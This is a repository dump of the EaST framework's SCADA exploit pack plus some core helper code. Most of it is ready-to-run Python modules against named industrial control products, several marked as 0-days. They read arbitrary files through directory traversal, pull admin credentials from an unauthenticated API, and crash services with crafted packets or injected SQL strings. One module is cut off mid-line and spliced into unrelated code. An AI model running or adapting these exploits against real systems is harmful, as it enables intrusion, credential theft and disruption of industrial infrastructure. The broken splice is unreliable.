21 | INFO['PATH'] = "Dos/" 22 | 23 | # Must be in every module, to be set by framework 24 | OPTIONS = OrderedDict() 25 | OPTIONS["HOST"] = "192.168.1.176" 26 | OPTIONS["PORT"] = 80 27 | OPTIONS["BASEPATH"] = "/" 28 | 29 | 30 | class exploit(Sploit): 31 | def __init__(self,host="", 32 | port=0, ssl=False, 33 | logger=None): 34 | Sploit.__init__(self, logger=logger) 35 | self.listener_port = None 36 | 37 | def args(self): 38 | self.args = Sploit.args(self, OPTIONS) 39 | self.host = self.args.get("HOST", OPTIONS["HOST"]) 40 | self.port = self.args.get("PORT", OPTIONS["PORT"]) 41 | self.vhost = self.args.get("BASEPATH", OPTIONS["BASEPATH"]) 42 | self.vhost = self.vhost if self.vhost.endswith("/") else self.vhost + "/" 43 | self.url = "http://{}:{}/{}".format(self.host, self.port, self.vhost) + "Silverlight/GetPermissions.asp?username=test%%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL%20--" 44 | 45 | def run(self): 46 | #Get options from gui 47 | self.args() 48 | self.log("[*] Sending crafted request...") 49 | for i in range(10): 50 | try: 51 | urllib2.urlopen(self.url) 52 | except socket.error as error: 53 | if error.errno == errno.WSAECONNRESET: 54 | self.log("[+] Service is unavailable now") 55 | self.finish(True) 56 | self.log("All data sent...") 57 | self.finish(False) 58 | 59 | 60 | if __name__ == '__main__': 61 | """ 62 | By now we only have the tool 63 | mode for exploit.. 64 | Later we would have 65 | standalone mode also. 66 | """ 67 | print "Running exploit %s .. 
" % INFO['NAME'] 68 | e = exploit("192.168.0.1",80) 69 | e.run() 70 | -------------------------------------------------------------------------------- /3rdParty/ef_scada_pack_demo/exploits/efs_delta_DIAEnergie_info_disclosure.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import urllib2 4 | import ssl 5 | import json 6 | import pprint 7 | from collections import OrderedDict 8 | from Sploit import Sploit 9 | 10 | 11 | INFO = {} 12 | INFO['NAME'] = "efs_delta_DIAEnergie_info_disclosure" 13 | INFO['DESCRIPTION'] = " Industrial Energy Management System DIAEnergie Information Disclosure" 14 | INFO['VENDOR'] = "http://www.deltaww.com" 15 | INFO["CVE Name"] = "0day" 16 | INFO["DOWNLOAD_LINK"] = "http://www.deltaww.com/services/DownloadCenter2.aspx?secID=8&pid=2&tid=0&CID=06&itemID=060702&typeID=1&downloadID=DIAEnergie,&title=DIAEnergie&dataType=8;&check=1&hl=en-US" 17 | INFO["LINKS"] = [] 18 | INFO['CHANGELOG'] = "30 Aug, 2017" 19 | INFO['PATH'] = "General/" 20 | INFO["NOTES"] = """ 21 | Vulnerability allows to show users credentials. Authentication is not required. 22 | Tested against DIAEnergie 1.5.90.91 on Windows 7 SP1 x64. 
23 | """ 24 | 25 | # Must be in every module, to be set by framework 26 | OPTIONS = OrderedDict() 27 | OPTIONS["HOST"] = "192.168.1.176" 28 | OPTIONS["PORT"] = 80 29 | OPTIONS["SSL"] = False 30 | 31 | 32 | class exploit(Sploit): 33 | def __init__(self,host="", 34 | port=0, ssl=False, 35 | logger=None): 36 | Sploit.__init__(self, logger=logger) 37 | self.name = INFO['NAME'] 38 | 39 | def args(self): 40 | self.args = Sploit.args(self, OPTIONS) 41 | self.host = self.args.get("HOST", OPTIONS["HOST"]) 42 | self.port = self.args.get("PORT", OPTIONS["PORT"]) 43 | self.ssl = self.args.get("SSL", OPTIONS["SSL"]) 44 | 45 | def make_url(self, path=''): 46 | proto = 'https' if self.ssl else 'http' 47 | url = '%s://%s:%s/%s' % (proto, self.host, self.port, path) 48 | return url 49 | 50 | def run(self): 51 | #Get options from gui 52 | self.args() 53 | url = self.make_url('') 54 | self.log('[*] Trying to connect to %s' % url) 55 | ctx = ssl.create_default_context() 56 | ctx.check_hostname = False 57 | ctx.verify_mode = ssl.CERT_NONE 58 | opener = urllib2.build_opener(urllib2.HTTPSHandler(context=ctx)) 59 | try: 60 | opener.open(url) 61 | except Exception as e: 62 | self.log(e) 63 | self.finish(False) 64 | self.log('[*] Trying to get admin\'s creds') 65 | resp = opener.open(self.make_url('DataHandler/WebApis/DIAE_usHandler.ashx?ttype=GetObject&pUid=1')).read() 66 | resp = json.loads(resp) 67 | self.log('[+]\r\n' + pprint.pformat(resp)) 68 | self.finish(True) 69 | 70 | 71 | if __name__ == '__main__': 72 | """ 73 | By now we only have the tool 74 | mode for exploit.. 75 | Later we would have 76 | standalone mode also. 77 | """ 78 | print "Running exploit %s .. 
" % INFO['NAME'] 79 | e = exploit("192.168.0.1",80) 80 | e.run() -------------------------------------------------------------------------------- /3rdParty/ef_scada_pack_demo/exploits/efs_eisbaer_scada_directory_traversal2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import urllib2 4 | from collections import OrderedDict 5 | 6 | from Sploit import Sploit 7 | 8 | INFO = {} 9 | INFO['NAME'] = "efs_eisbaer_scada_directory_traversal2" 10 | INFO['DESCRIPTION'] = "EisBaer Scada Smart-Client's Server Directory Traversal" 11 | INFO['VENDOR'] = "http://www.busbaer.de/" 12 | INFO["CVE Name"] = "0day" 13 | INFO["NOTES"] = """ 14 | Vulnerability allows unauthenticated user to read contents of arbitrary file on remote machine. 15 | Tested against version 2.1.1321.1942 on Windows 7 x64. 16 | """ 17 | INFO["DOWNLOAD_LINK"] = "http://www.busbaer.de/eiscomp,index,op,sub,op1,24.html" 18 | INFO["LINKS"] = [""] 19 | INFO['CHANGELOG'] = "27 Jun, 2017. Written by Gleg team." 
20 | INFO['PATH'] = "General/" 21 | 22 | # Must be in every module, to be set by framework 23 | OPTIONS = OrderedDict() 24 | OPTIONS["HOST"] = "192.168.1.176" 25 | OPTIONS["PORT"] = 8000 26 | OPTIONS["HTTPS"] = False 27 | OPTIONS["FILENAME"] = "/windows/win.ini" 28 | 29 | 30 | class exploit(Sploit): 31 | def __init__(self, host="", 32 | port=0, ssl=False, 33 | logger=None): 34 | Sploit.__init__(self, logger=logger) 35 | self.name = INFO['NAME'] 36 | 37 | def args(self): 38 | self.args = Sploit.args(self, OPTIONS) 39 | self.host = self.args.get("HOST", OPTIONS["HOST"]) 40 | self.port = self.args.get("PORT", OPTIONS["PORT"]) 41 | self.https = self.args.get("HTTPS", OPTIONS["HTTPS"]) 42 | self.filename = self.args.get("FILENAME", OPTIONS["FILENAME"]) 43 | 44 | def make_url(self, path=''): 45 | protocol = "https" if self.https else "http" 46 | url = "%s://%s:%s/%s" % (protocol, self.host, self.port, path) 47 | return url 48 | 49 | def run(self): 50 | # Get options from gui 51 | self.args() 52 | self.log('[*] Trying to get contents of %s' % self.filename) 53 | url = self.make_url('Eisbaer.RESTServices/ReqCVFile?x=%s' % urllib2.quote(self.filename)) 54 | resp = urllib2.urlopen(url) 55 | if resp.code != 200: 56 | self.log("File is not exists") 57 | self.finish(False) 58 | content = resp.read() 59 | if len(content) < 10000: 60 | self.log('[+]\r\n' + content) 61 | self.writefile(content) 62 | self.finish(True) 63 | 64 | 65 | if __name__ == '__main__': 66 | """ 67 | By now we only have the tool 68 | mode for exploit.. 69 | Later we would have 70 | standalone mode also. 71 | """ 72 | print "Running exploit %s .. 
" % INFO['NAME'] 73 | e = exploit("192.168.0.1", 80) 74 | e.run() -------------------------------------------------------------------------------- /3rdParty/ef_scada_pack_demo/exploits/efs_eisbaer_scada_dt.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import urllib2 4 | import os 5 | from collections import OrderedDict 6 | 7 | from Sploit import Sploit 8 | 9 | INFO = {} 10 | INFO['NAME'] = "efs_eisbaer_scada_dt" 11 | INFO['DESCRIPTION'] = "EisBaer Scada Webserver Directory Traversal" 12 | INFO['VENDOR'] = "http://www.busbaer.de/" 13 | INFO["CVE Name"] = "" 14 | INFO["NOTES"] = """ 15 | Vulnerability allows unauthenticated user read content of arbitrary file on remote machine. 16 | Tested against version 2.1 on Windows 7 x64. 17 | """ 18 | INFO["DOWNLOAD_LINK"] = "http://www.busbaer.de/eiscomp,index,op,sub,op1,24.html" 19 | INFO["LINKS"] = [""] 20 | INFO['CHANGELOG'] = "26 Apr, 2016. Written by Gleg team." 21 | INFO['PATH'] = "General/" 22 | 23 | # Must be in every module, to be set by framework 24 | OPTIONS = OrderedDict() 25 | OPTIONS["HOST"] = "192.168.1.222" 26 | OPTIONS["PORT"] = 80 27 | OPTIONS["HTTPS"] = False 28 | OPTIONS["FILENAME"] = "/../../../../../windows/win.ini" 29 | 30 | 31 | class exploit(Sploit): 32 | def __init__(self, host="", 33 | port=0, ssl=False, 34 | logger=None): 35 | Sploit.__init__(self, logger=logger) 36 | self.ports_map = {} 37 | 38 | def args(self): 39 | self.args = Sploit.args(self, OPTIONS) 40 | self.host = self.args.get("HOST", OPTIONS["HOST"]) 41 | self.port = self.args.get("PORT", OPTIONS["PORT"]) 42 | self.https = self.args.get("HTTPS", OPTIONS["HTTPS"]) 43 | self.filename = self.args.get("FILENAME", OPTIONS["FILENAME"]) 44 | protocol = "https" if self.https else "http" 45 | self.url = "{}://{}:{}".format(protocol, self.host, self.port) 46 | 47 | def run(self): 48 | # Get options from gui 49 | self.args() 50 | resp = urllib2.urlopen(self.url + self.filename) 
51 | if resp.code != 200: 52 | self.log("File not exists") 53 | self.finish(False) 54 | content = resp.read() 55 | filename = os.path.basename(self.filename) 56 | self.writefile(content, filename) 57 | self.finish(True) 58 | 59 | 60 | if __name__ == '__main__': 61 | """ 62 | By now we only have the tool 63 | mode for exploit.. 64 | Later we would have 65 | standalone mode also. 66 | """ 67 | print "Running exploit %s .. " % INFO['NAME'] 68 | e = exploit("192.168.0.1", 80) 69 | e.run() -------------------------------------------------------------------------------- /3rdParty/ef_scada_pack_demo/exploits/efs_esa_automation_crew_webserver_dir_trav.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import urllib2 4 | 5 | from collections import OrderedDict 6 | from Sploit import Sploit 7 | 8 | 9 | INFO = {} 10 | INFO['NAME'] = 'efs_esa_automation_crew_webserver_dir_trav' 11 | INFO['DESCRIPTION'] = 'ESA-Automation Crew Webserver Directory Traveral' 12 | INFO['VENDOR'] = 'https://www.esa-automation.com/en/products/crew/' 13 | INFO['CVE Name'] = '0day' 14 | INFO['DOWNLOAD_LINK'] = 'https://www.esa-automation.com/en/category-downloads/' 15 | INFO['LINKS'] = [] 16 | INFO['CHANGELOG'] = '28 Feb 2018' 17 | INFO['PATH'] = 'Web/' 18 | INFO['NOTES'] = """Vulnerability allows remote attackers to disclose files. 19 | Authentication is not required to exploit this vulnerability. 20 | Tested against Crew 02.00.174 on Windows 7 SP1 x64. 
21 | """ 22 | 23 | OPTIONS = OrderedDict() 24 | OPTIONS['HOST'] = '192.168.1.103' 25 | OPTIONS['PORT'] = 8080 26 | OPTIONS['FILENAME'] = '../../../../../../../../../../windows/win.ini' 27 | 28 | 29 | class exploit(Sploit): 30 | def __init__(self,host="", 31 | port=0, ssl=False, 32 | logger=None): 33 | Sploit.__init__(self, logger=logger) 34 | self.name = INFO['NAME'] 35 | 36 | def args(self): 37 | self.args = Sploit.args(self, OPTIONS) 38 | self.host = self.args.get('HOST', OPTIONS['HOST']) 39 | self.port = self.args.get('PORT', OPTIONS['PORT']) 40 | self.filename = self.args.get('FILENAME', OPTIONS['FILENAME']) 41 | 42 | def make_url(self, path=''): 43 | url = 'http://%s:%s/%s' % (self.host, self.port, path) 44 | return url 45 | 46 | def run(self): 47 | #Get options from gui 48 | self.args() 49 | url = self.make_url() 50 | self.log('[*] Checking connection to %s' % url) 51 | urllib2.urlopen(url) 52 | self.log('[*] Trying to disclose "%s"' % self.filename) 53 | self.filename = self.filename.replace('\\', '/').replace('..', '%2e%2e') 54 | url = self.make_url(self.filename) 55 | try: 56 | res = urllib2.urlopen(url).read() 57 | except urllib2.HTTPError as e: 58 | if e.code == 404: 59 | self.log('[-] File not found') 60 | self.finish(False) 61 | self.writefile(res, self.filename.split('/').pop()) 62 | if len(res) < 10000: 63 | self.log('[+]\r\n' + res) 64 | self.finish(True) 65 | 66 | 67 | if __name__ == '__main__': 68 | print "Running exploit %s .. 
" % INFO['NAME'] 69 | e = exploit("192.168.0.1", 80) 70 | e.run() -------------------------------------------------------------------------------- /3rdParty/ef_scada_pack_demo/exploits/efs_laquis_scada_directory_traversal.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import urllib2 4 | import json 5 | from collections import OrderedDict 6 | 7 | from Sploit import Sploit 8 | 9 | INFO = {} 10 | INFO['NAME'] = "efs_laquis_scada_directory_traversal" 11 | INFO['DESCRIPTION'] = "LAquis SCADA <= 4.1.0.3237 Directory Traversal" 12 | INFO['VENDOR'] = "http://laquisscada.com/" 13 | INFO["CVE Name"] = "" 14 | INFO["NOTES"] = """ 15 | Vulnerability allows unauthenticated user to read contents of arbitrary file on remote machine. 16 | Tested against LAquis SCADA 4.1.0.3066 on Windows 7 SP1 x64. 17 | """ 18 | INFO["DOWNLOAD_LINK"] = "http://laquisscada.com/index-3.html" 19 | INFO["LINKS"] = [""] 20 | INFO['CHANGELOG'] = "4 Jul, 2017. Written by Gleg team." 
INFO['PATH'] = "General/"

# Must be in every module, to be set by framework
OPTIONS = OrderedDict()
OPTIONS["HOST"] = "192.168.1.176"
OPTIONS["PORT"] = 1234
OPTIONS["FILENAME"] = "../../../../../windows/win.ini"


class exploit(Sploit):
    # EaST module: reads one file from a LAquis SCADA web server via a
    # path-traversal GET. The path goes through urllib2.quote(), which leaves
    # "/" and "." untouched, so "../" stays visible as "../" in access logs.
    # Defender notes: alert on dot-dot path segments in requests to the SCADA
    # web port; server-side, canonicalise the path and confine it to the web root.
    def __init__(self, host="",
                 port=0, ssl=False,
                 logger=None):
        Sploit.__init__(self, logger=logger)
        self.name = INFO['NAME']

    def args(self):
        # Read GUI-provided options; rebinds self.args to the returned dict.
        self.args = Sploit.args(self, OPTIONS)
        self.host = self.args.get("HOST", OPTIONS["HOST"])
        self.port = self.args.get("PORT", OPTIONS["PORT"])
        self.filename = self.args.get("FILENAME", OPTIONS["FILENAME"])

    def make_url(self, path=''):
        url = "http://%s:%s/%s" % (self.host, self.port, path)
        return url

    def check(self):
        # Connectivity probe against the server root.
        url = self.make_url()
        self.log('[*] Checking %s' % url)
        try:
            urllib2.urlopen(url)
        except:
            # NOTE(review): a connection failure is reported with finish(True),
            # which reads inverted; the bare except also swallows KeyboardInterrupt.
            self.log('[-] Can\'t connect to %s' % url)
            self.finish(True)


    def run(self):
        # Get options from gui
        self.args()
        self.check()
        self.log('[*] Trying to get contents of %s' % self.filename)
        url = self.make_url(urllib2.quote(self.filename))
        # A non-2xx status raises urllib2.HTTPError here rather than returning,
        # so the `!= 200` check below is only reached for other 2xx codes.
        resp = urllib2.urlopen(url)
        if resp.code != 200:
            self.log("File is not exists")
            self.finish(False)
        content = resp.read()
        # Small responses are echoed to the log; the file is always saved.
        if len(content) < 10000:
            self.log('[+]\r\n' + content)
        self.writefile(content)
        self.finish(True)


if __name__ == '__main__':
    """
    By now we only have the tool
    mode for exploit..
    Later we would have
    standalone mode also.
    """
    print "Running exploit %s .. " % INFO['NAME']
    e = exploit("192.168.0.1", 80)
    e.run()
-------------------------------------------------------------------------------- /3rdParty/ef_scada_pack_demo/exploits/efs_logi_cals_logi_RTS_RTShttpd_DoS.py: --------------------------------------------------------------------------------
#!/usr/bin/env python
# EaST module: sends one malformed HTTP request to logi.RTS's RTShttpd and
# reports success if nothing is received back within 5 seconds.
# Defender notes: the request line is well-formed but the header block is a
# bare token with no colon; a network-sensor rule on colon-less header lines
# to the HMI web port, together with service-availability monitoring, is the
# practical detection. Restrict reachability of the service and apply the
# vendor fix.
import socket
from collections import OrderedDict


from Sploit import Sploit

INFO = {}
INFO['NAME'] = "efs_logi_cals_logi_RTS_RTShttpd_DoS"
INFO['DESCRIPTION'] = "logi.cals logi.RTS RTShttpd DoS"
INFO['VENDOR'] = "https://www.logicals.com/"
INFO["CVE Name"] = ""
INFO["NOTES"] = """
Vulnerability exists in webserver. Special TCP packet cause DoS.
Tested against logi.RTS RTShttpd.exe on Windows 7 x64 SP1.
"""
INFO["DOWNLOAD_LINK"] = "https://www.logicals.com/en/support/downloads"
INFO["LINKS"] = []
INFO['CHANGELOG'] = "30 Mar, 2018"
INFO['PATH'] = "General/"

# Must be in every module, to be set by framework
OPTIONS = OrderedDict()
OPTIONS["HOST"] = "192.168.1.103"
OPTIONS["PORT"] = 80


class exploit(Sploit):
    def __init__(self,host="",
                 port=0, ssl=False,
                 logger=None):
        Sploit.__init__(self, logger=logger)
        self.name = INFO['NAME']

    def args(self):
        # Read GUI-provided options; rebinds self.args to the returned dict.
        self.args = Sploit.args(self, OPTIONS)
        self.host = self.args.get("HOST", OPTIONS["HOST"])
        self.port = self.args.get("PORT", OPTIONS["PORT"])

    def run(self):
        #Get options from gui
        self.args()
        s = socket.socket()
        s.settimeout(5)
        self.log('[*] Trying to connect to %s:%s' % (self.host, self.port))
        s.connect((self.host, self.port))
        dos = 'GET /1 HTTP/1.1\r\nDOS\r\n\r\n'
        s.send(dos)
        try:
            # Silence for 5 s is taken as "service down"; any reply within the
            # window falls through to finish(False).
            s.recv(1024)
        except socket.timeout:
            self.log('[+] RTShttpd service is unavailable')
            self.finish(True)
        # The socket is never closed explicitly; it is released with the object.
        self.finish(False)



if __name__ == '__main__':
""" 60 | By now we only have the tool 61 | mode for exploit.. 62 | Later we would have 63 | standalone mode also. 64 | """ 65 | print "Running exploit %s .. " % INFO['NAME'] 66 | e = exploit("192.168.0.1",80) 67 | e.run() -------------------------------------------------------------------------------- /3rdParty/ef_scada_pack_demo/exploits/efs_logi_cals_logi_RTS_dir_trav.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import urllib2 3 | import base64 4 | from collections import OrderedDict 5 | 6 | 7 | from Sploit import Sploit 8 | 9 | INFO = {} 10 | INFO['NAME'] = "efs_logi_cals_logi_RTS_dir_trav" 11 | INFO['DESCRIPTION'] = "logi.cals logi.RTS Directory Traversal" 12 | INFO['VENDOR'] = "https://www.logicals.com/" 13 | INFO["CVE Name"] = "" 14 | INFO["NOTES"] = """ 15 | Vulnerability exists in webserver. Remote attacker can disclose arbitrary file on remote machine using "../" combination. 16 | Tested against logi.RTS RTShttpd.exe on Windows 7 x64 SP1. 
17 | """ 18 | INFO["DOWNLOAD_LINK"] = "https://www.logicals.com/en/support/downloads" 19 | INFO["LINKS"] = [] 20 | INFO['CHANGELOG'] = "30 Mar, 2018" 21 | INFO['PATH'] = "General/" 22 | 23 | # Must be in every module, to be set by framework 24 | OPTIONS = OrderedDict() 25 | OPTIONS["HOST"] = "192.168.1.103" 26 | OPTIONS["PORT"] = 80 27 | OPTIONS["FILENAME"] = "../../../../../../Windows/win.ini" 28 | 29 | 30 | class exploit(Sploit): 31 | def __init__(self,host="", 32 | port=0, ssl=False, 33 | logger=None): 34 | Sploit.__init__(self, logger=logger) 35 | self.payload = "" 36 | 37 | def args(self): 38 | self.args = Sploit.args(self, OPTIONS) 39 | self.host = self.args.get("HOST", OPTIONS["HOST"]) 40 | self.port = self.args.get("PORT", OPTIONS["PORT"]) 41 | self.filename = self.args.get("FILENAME", OPTIONS["FILENAME"]) 42 | 43 | def make_url(self, path=''): 44 | url = 'http://{}:{}/'.format(self.host, self.port) + path 45 | return url 46 | 47 | def run(self): 48 | #Get options from gui 49 | self.args() 50 | url = self.make_url() 51 | self.log('[*] Trying to connect to {}'.format(url)) 52 | urllib2.urlopen(url) 53 | self.log('[*] Trying to get content of {}'.format(self.filename)) 54 | url = self.make_url(self.filename) 55 | data = urllib2.urlopen(url).read() 56 | if len(data) < 10000: 57 | self.log('[+]\r\n' + data) 58 | self.writefile(data) 59 | self.finish(True) 60 | 61 | 62 | 63 | if __name__ == '__main__': 64 | """ 65 | By now we only have the tool 66 | mode for exploit.. 67 | Later we would have 68 | standalone mode also. 69 | """ 70 | print "Running exploit %s .. 
" % INFO['NAME'] 71 | e = exploit("192.168.0.1",80) 72 | e.run() -------------------------------------------------------------------------------- /3rdParty/ef_scada_pack_demo/exploits/efs_loytec_lweb900_server_dir_trav.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import urllib2 3 | import base64 4 | from collections import OrderedDict 5 | 6 | 7 | from Sploit import Sploit 8 | 9 | INFO = {} 10 | INFO['NAME'] = "efs_loytec_lweb900_server_dir_trav" 11 | INFO['DESCRIPTION'] = "Loytec LWEB-900 Directory Traversal" 12 | INFO['VENDOR'] = "https://www.logicals.com/" 13 | INFO["CVE Name"] = "" 14 | INFO["DOWNLOAD_LINK"] = "https://www.loytec.com/support/download/cat_view/13-software" 15 | INFO["LINKS"] = [] 16 | INFO['CHANGELOG'] = "4 Apr, 2018" 17 | INFO['PATH'] = "General/" 18 | INFO["NOTES"] = """ 19 | Vulnerability exists in LWEB-900 server in ProjectLWeb802Service. 20 | Remote attacker can disclose arbitrary file on remote machine using ".../" combination. Authentication is not required. 21 | Tested against LWEB-900 2.2.2 on Windows 7 x64 SP1. 
22 | """ 23 | 24 | # Must be in every module, to be set by framework 25 | OPTIONS = OrderedDict() 26 | OPTIONS["HOST"] = "192.168.1.103" 27 | OPTIONS["PORT"] = 8080 28 | OPTIONS["FILENAME"] = "windows/win.ini" 29 | 30 | 31 | class exploit(Sploit): 32 | def __init__(self,host="", 33 | port=0, ssl=False, 34 | logger=None): 35 | Sploit.__init__(self, logger=logger) 36 | self.payload = "" 37 | 38 | def args(self): 39 | self.args = Sploit.args(self, OPTIONS) 40 | self.host = self.args.get("HOST", OPTIONS["HOST"]) 41 | self.port = self.args.get("PORT", OPTIONS["PORT"]) 42 | self.filename = self.args.get("FILENAME", OPTIONS["FILENAME"]) 43 | 44 | def make_url(self, path=''): 45 | url = 'http://{}:{}/'.format(self.host, self.port) + path 46 | return url 47 | 48 | def run(self): 49 | #Get options from gui 50 | self.args() 51 | url = self.make_url() 52 | self.log('[*] Trying to connect to {}'.format(url)) 53 | try: 54 | urllib2.urlopen(url) 55 | except urllib2.HTTPError as e: 56 | if e.code == 404: 57 | pass 58 | self.log('[*] Trying to get content of {}'.format(self.filename)) 59 | url = self.make_url('lweb900/' + '.../'*6 + self.filename) 60 | data = urllib2.urlopen(url).read() 61 | if len(data) < 10000: 62 | self.log('[+]\r\n' + data) 63 | self.writefile(data) 64 | self.finish(True) 65 | 66 | 67 | if __name__ == '__main__': 68 | """ 69 | By now we only have the tool 70 | mode for exploit.. 71 | Later we would have 72 | standalone mode also. 73 | """ 74 | print "Running exploit %s .. 
" % INFO['NAME'] 75 | e = exploit("192.168.0.1",80) 76 | e.run() -------------------------------------------------------------------------------- /3rdParty/ef_scada_pack_demo/exploits/efs_lsis_XP_Manager_DoS.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import socket 4 | import struct 5 | import time 6 | from collections import OrderedDict 7 | from Sploit import Sploit 8 | 9 | INFO = {} 10 | INFO['NAME'] = "efs_lsis_XP_Manager_DoS" 11 | INFO['DESCRIPTION'] = "LSIS XP-Manager DoS" 12 | INFO['VENDOR'] = "http://www.lsis.com" 13 | INFO["CVE Name"] = "0day" 14 | INFO["NOTES"] = """ 15 | Vulnerability allows remote attacker to crash a XP-Server. 16 | Tested against XP-Manager V2.03 on Windows 7 x64. 17 | """ 18 | INFO["DOWNLOAD_LINK"] = "http://www.lsis.com/support/download/" 19 | INFO["LINKS"] = [""] 20 | INFO['CHANGELOG'] = "21 Feb, 2018. Written by Gleg team." 21 | INFO['PATH'] = "General/" 22 | 23 | # Must be in every module, to be set by framework 24 | OPTIONS = OrderedDict() 25 | OPTIONS["HOST"] = "192.168.1.103" 26 | OPTIONS["PORT"] = 2143 27 | 28 | 29 | class exploit(Sploit): 30 | def __init__(self, host="", 31 | port=0, ssl=False, 32 | logger=None): 33 | Sploit.__init__(self, logger=logger) 34 | self.name = INFO['NAME'] 35 | 36 | def args(self): 37 | self.args = Sploit.args(self, OPTIONS) 38 | self.host = self.args.get("HOST", OPTIONS["HOST"]) 39 | self.port = self.args.get("PORT", OPTIONS["PORT"]) 40 | 41 | def send(self, data): 42 | self.sock.send(data) 43 | res = self.sock.recv(16000) 44 | print repr(res) 45 | return res 46 | 47 | def run(self): 48 | # Get options from gui 49 | self.args() 50 | self.log('[*] Trying to connect to %s:%s' % (self.host, self.port)) 51 | self.sock = socket.socket() 52 | self.sock.connect((self.host, self.port)) 53 | garb = 'A' * 2000 54 | data = "\x0a\x05\x00\x00\x20\xf5\x00\x8c\x5a\xf5\x00\x8c\x5a\xf5\x00\x8c\x5a" + \ 55 | struct.pack(" 1 and type(value[1] 
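# [page residue: tail of a definition that begins before this chunk; kept verbatim as comments]
# is dict):
#     ext_options = value[1]
#     value = value[0]
# if type(value) is int:
#     res[option] = dict(type="int", value=value)
# elif type(value) is bool:
#     res[option] = dict(type="bool", value=value)
# elif type(value) is dict:
#     res[option] = value
#     res[option]["type"] = "list"
# else:
#     res[option] = dict(type="string", value=value)
# res[option].update(ext_options)
# return res
# -------------------------------------------------------------------------------- /core/ServiceMessagesHandler.py: --------------------------------------------------------------------------------
from itertools import groupby  # kept: imported by the original file, not used here
from collections import defaultdict


class ServiceMessageLevel:
    """Severity of a ServiceMessage (plain int constants)."""
    DEBUG = 1
    INFO = 2
    WARNING = 3
    ERROR = 4


class ServiceMessageType:
    """Kind of a ServiceMessage: a missing-import report or an update notice."""
    IMPORT = 1
    UPDATES = 2


class ServiceMessage:
    """One message destined for the GUI.

    IMPORT messages additionally record which module (`module_with_unknown_import`)
    needs which library (`module_to_import`); for other kinds both are None.
    """

    def __init__(self, message, message_type, level, **kwargs):
        self.message = message
        self.message_type = message_type
        self.level = level
        # Only meaningful for IMPORT messages; None otherwise.
        self.module_to_import = kwargs.get('module_to_import')
        self.module_with_unknown_import = kwargs.get('module_with_unknown_import')

    def serialize(self):
        """Return the message as a dict.

        This is the live instance __dict__ (used for equality in
        ServiceMessagesHandler.add_message); callers must not mutate it.
        """
        return self.__dict__


class ServiceMessagesHandler:
    """Collects ServiceMessages, de-duplicates them and renders them for the GUI."""

    def __init__(self):
        self.messages = []

    def reset(self):
        """Drop every collected message."""
        self.messages = []

    def remove_import_error(self, library_name):
        """Drop the import-error messages that refer to `library_name`.

        A list comprehension keeps self.messages a list on Python 3 as well;
        a bare filter() would leave a one-shot iterator there that the next
        serialize() call silently exhausts.
        """
        self.messages = [m for m in self.messages if m.module_to_import != library_name]

    def get_grouped(self):
        """Return serialized messages with IMPORT messages folded into one entry per missing library.

        Non-IMPORT messages pass through unchanged, in insertion order; they are
        followed by one synthetic dict per missing library listing every module
        that needs it. The synthetic dicts carry an extra 'installed' key.
        """
        passthrough = []
        modules_by_library = defaultdict(list)
        for message in self.messages:
            if message.message_type == ServiceMessageType.IMPORT:
                modules_by_library[message.module_to_import].append(message.module_with_unknown_import)
            else:
                passthrough.append(message.serialize())

        def summarize(library, modules):
            # Same keys as ServiceMessage.serialize() minus module_with_unknown_import,
            # plus 'installed'. Note: join() requires every module name to be a str;
            # an IMPORT message added without module_with_unknown_import would
            # raise TypeError here.
            return dict(message='Modules %s require python module %s' % (', '.join(modules), library),
                        message_type=ServiceMessageType.IMPORT,
                        module_to_import=library,
                        level=ServiceMessageLevel.ERROR,
                        installed=False)

        grouped = [summarize(library, modules) for library, modules in modules_by_library.items()]
        return passthrough + grouped

    def serialize(self):
        """Serialize every message, in insertion order."""
        return [message.serialize() for message in self.messages]

    def add_message(self, message, message_type=ServiceMessageType.IMPORT, level=ServiceMessageLevel.ERROR, **kwargs):
        """Append a message unless an identical one (same serialized form) is already stored.

        kwargs are forwarded to ServiceMessage (module_to_import, module_with_unknown_import).
        """
        msg = ServiceMessage(message, message_type, level, **kwargs)
        if msg.serialize() in self.serialize():
            return
        # Store the instance that was compared, rather than building a second one.
        self.messages.append(msg)

    def get_messages(self, message_type=None, level=None):
        """Return serialized messages, optionally restricted to a type and/or a level.

        A falsy filter value (None, 0) means "no filter".
        """
        selected = [
            item for item in self.messages
            if (item.message_type == message_type if message_type else True)
            and (item.level == level if level else True)
        ]
        return [msg.serialize() for msg in selected]
# -------------------------------------------------------------------------------- /core/__init__.py: --------------------------------------------------------------------------------
# https://raw.githubusercontent.com/C0reL0ader/EaST/4b1ab5333022bbd476e9a43f13c4a4b559488752/core/__init__.py
# -------------------------------------------------------------------------------- /core/helpers/__init__.py: --------------------------------------------------------------------------------
# https://raw.githubusercontent.com/C0reL0ader/EaST/4b1ab5333022bbd476e9a43f13c4a4b559488752/core/helpers/__init__.py
# -------------------------------------------------------------------------------- /core/helpers/archieve/__init__.py: --------------------------------------------------------------------------------
# https://raw.githubusercontent.com/C0reL0ader/EaST/4b1ab5333022bbd476e9a43f13c4a4b559488752/core/helpers/archieve/__init__.py
# -------------------------------------------------------------------------------- /core/helpers/archieve/jar.py: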
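# --------------------------------------------------------------------------------
from zip import Zip
import os


class Jar(Zip):
    """A Zip archive that also maintains a META-INF/MANIFEST.MF for the entries added to it.

    The manifest is written lazily: get_raw() and get_jar() add it on first use
    unless create_manifest() was already called.
    """

    def __init__(self, filename=''):
        Zip.__init__(self, filename)
        self.manifest = self.get_manifest()
        self.is_manifest_created = False

    def get_manifest(self, main_class='east.Payload'):
        """Return the manifest header (version, Main-Class, Permissions) as a string."""
        manifest = 'Manifest-Version: 1.0\n'
        manifest += 'Main-Class: %s\n' % main_class
        manifest += 'Permissions: all-permissions\n\n'
        return manifest

    def add_file(self, name, content='', write_to_manifest=True):
        """Add an entry through Zip.add_file and, by default, record it in the manifest."""
        Zip.add_file(self, name, content)
        if write_to_manifest:
            self.__add_file_to_manifest(name)

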